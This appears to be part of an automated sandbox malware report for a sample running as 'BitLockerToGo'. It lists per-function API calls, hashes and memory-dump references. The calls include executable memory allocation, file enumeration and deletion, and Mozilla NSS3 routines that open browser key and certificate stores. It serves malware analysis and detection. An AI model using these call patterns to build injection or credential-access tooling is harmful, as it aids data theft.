                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2104210347-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dc5840b6246a7598bf189fe596ebd96f51bc210ede93d0bfac45f6041f93a492
                                                                                                                                                                                                                                                                                                                    • Instruction ID: fc3e89f87666eb3f93c041566c525c2b4288fb36050d58ac59c6219360f4eb2b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc5840b6246a7598bf189fe596ebd96f51bc210ede93d0bfac45f6041f93a492
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0317E7690000DAFDF26EBA8DC03DF87779FB58308F5408A5B604E3261DA715A968F62
                                                                                                                                                                                                                                                                                                                    Function 008E7728 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,008E7B48,?,?), ref: 008E777A
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 008E77A4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47ab052c3c1224f650ec307dd9920f4b1cf0b45560c917133fa5fdf5f359c4a3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c5974c3f39f1e311aaf8f00ee54d62e1c1dc8a35bb3d117999093b4e04849baa
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47ab052c3c1224f650ec307dd9920f4b1cf0b45560c917133fa5fdf5f359c4a3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A11BE75604745ABC720CFB5CD84BAAB7F4FB46714F20482DE61AD7290D270AD40CB10
                                                                                                                                                                                                                                                                                                                    Function 008F9C8D Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 38231d5654a8013c990616fb0ad4944aab798ec154c77fa9df2cc577debfb1b6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: afc79fb8b0fe706b52b9e7f2dc60e47181485491e5e36a285b46984ad6cd7766
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38231d5654a8013c990616fb0ad4944aab798ec154c77fa9df2cc577debfb1b6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3515FB1C11388ABDF717BFE858EB74B5D5FF61314B240446E780CA136EB214E809E66
                                                                                                                                                                                                                                                                                                                    Function 008E7B02 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 827d34beeb1df16add6ede973ea2e7436febdbf66c8663c77dc831316758aac4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0a29d303cfa1da28f1b15a3e0df58fe8cb0947a9419991d8e416da2b3108196c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 827d34beeb1df16add6ede973ea2e7436febdbf66c8663c77dc831316758aac4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34317F719086989FCF1ADF5ADC408ADBBB5FF96320B30456AE411E7361DB309E80CB81
                                                                                                                                                                                                                                                                                                                    Function 008F3A18 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ae5d09e6d64be2b75958df1a5074987f9b048cc1995e0bad7996f4b1a05d57f5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 937f4d5bdc160163bfcca4185015071cd3c86a6274c4c933535ecedbe71718c5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae5d09e6d64be2b75958df1a5074987f9b048cc1995e0bad7996f4b1a05d57f5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F01771E1016DABDB15DF68DC51AAEB7FCEB48200F0045B6AA09E3291DA70AF458B91
                                                                                                                                                                                                                                                                                                                    Function 008F39EE Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: db6d9f308baaea68f5f52074b8d5b8f19aa8ab85423857439b25da78959901b6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 124772bad231750089ae64be15be416fd47cc0a6dce1881c0f304a51a8396988
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db6d9f308baaea68f5f52074b8d5b8f19aa8ab85423857439b25da78959901b6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FD05E7110047CA74A2026BEDC088BABE18EB027B5B114320FE99D61B1D7619E6246C0
                                                                                                                                                                                                                                                                                                                    Function 008F3A7B Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 66db5bb4d1e40ed047ec666bf404169ec9d4fd1b5a6011163c1bc0fa76e200bb
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8cca2d648ac9fc8b9d3ce9e08811d1bad671ede6719f18e985f3b4d203bdc85f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66db5bb4d1e40ed047ec666bf404169ec9d4fd1b5a6011163c1bc0fa76e200bb
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62E02B36601F386B8732097BC90497ABB9AEFC5BA170D4129DF89CB354D931CD0A86E0
                                                                                                                                                                                                                                                                                                                    Function 008E8FEF Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 53d00fcf87674269c65aeb0e51412fa678d708c4fb19e7713bbbd52c6ea4d0b9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 75bcd047c93fc10f03ff76eff20e4cf21ba3003d67c6b890d882c527840c6907
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53d00fcf87674269c65aeb0e51412fa678d708c4fb19e7713bbbd52c6ea4d0b9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79E0EDB5A10108BFDF40DBA9D805A9DBBF8EB45354F104065BA05E3241FA70EE01DA51

                                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                                    Function 6CAA6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2120,6CAA7E60), ref: 6CAA6EBC
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA6EDF
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA6EF3
                                                                                                                                                                                                                                                                                                                    • PR_WaitCondVar.NSS3(000000FF), ref: 6CAA6F25
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA7A900: TlsGetValue.KERNEL32(00000000,?,6CBF14E4,?,6CA14DD9), ref: 6CA7A90F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA7A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA7A94F
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA6F68
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CAA6FA9
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA70B4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA70C8
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF24C0,6CAE7590), ref: 6CAA7104
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAA7117
                                                                                                                                                                                                                                                                                                                    • SECOID_Init.NSS3 ref: 6CAA7128
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000057), ref: 6CAA714E
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA717F
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA71A9
                                                                                                                                                                                                                                                                                                                    • PR_NotifyAllCondVar.NSS3 ref: 6CAA71CF
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA71DD
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAA71EE
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAA7208
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7221
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000001), ref: 6CAA7235
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA724A
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA725E
                                                                                                                                                                                                                                                                                                                    • PR_NotifyCondVar.NSS3 ref: 6CAA7273
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA7281
                                                                                                                                                                                                                                                                                                                    • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAA7291
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA72B1
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA72D4
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA72E3
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7301
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7310
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7335
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7344
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7363
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAA7372
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CBE0148,,defaultModDB,internalKeySlot), ref: 6CAA74CC
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7513
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA751B
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7528
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA753C
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7550
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7561
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7572
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7583
